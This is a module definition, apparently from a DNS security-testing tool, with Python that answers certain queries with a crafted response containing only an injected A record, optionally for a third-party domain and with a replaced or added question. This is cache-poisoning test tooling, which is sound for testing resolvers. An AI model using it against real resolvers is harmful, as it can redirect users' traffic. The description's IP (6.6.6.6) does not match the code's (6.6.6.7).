[module]
name = "inj07"
type = "feature"
info = "Injection 7 - Only injected A record"
desc = "Respond only with injected A record (inj07poc.yourdomain.com -> 6.6.6.6)."
author = "ivan.jedek@oryxlabs.com"
category = "Record injections"

code = '''
if req.first_subdomain.startswith("inj07"):
   # Send only 1 injected A record
   injip = "6.6.6.7"
   addedquestions = b''
   if "3rdparty" in req.subdomains:  # inject a 3rd party domain
      injdom = "injected07." + a3rdparty_domain
   else:
      injdom = "injected07." + req.sld_tld_domain
   if "rpq" in req.subdomains:  # replace the question with our injected stuffs
      orig_req_domain = req.full_domain
      req.full_domain = injdom
      addcustomlog("RPQ")
   if "adq" in req.subdomains:  # add additional question for our injected stuffs
      resp.QURR = req.QURR+1
      addedquestions  = convDom2Bin(injdom) + req.type_bin + req.class_bin
      addcustomlog("ADQ")
   ### DNS header ########
   buffer = prep_dns_header(b'\x84\x00', resp.QURR, 1, 0, 0)
   ### QUESTION SECTION ########
   if resp.noq: buffer += convDom2Bin(req.full_domain) + req.type_bin + req.class_bin
   buffer += addedquestions
   ### ANSWER SECTION ########
   # injected A
   buffer += convDom2Bin(injdom) + getTypeBin("A") + getClassBin("IN")
   buffer += struct.pack(">L", resp.TTL)                 ## TTL
   buffer += struct.pack(">H", 4)                        ## Data length
   buffer += socket.inet_aton(injip)                     ## IP
   # log and send
   log("A %s (%s)" % (injdom, injip))
   send_buf(self, buffer)
   #####################################################################
'''
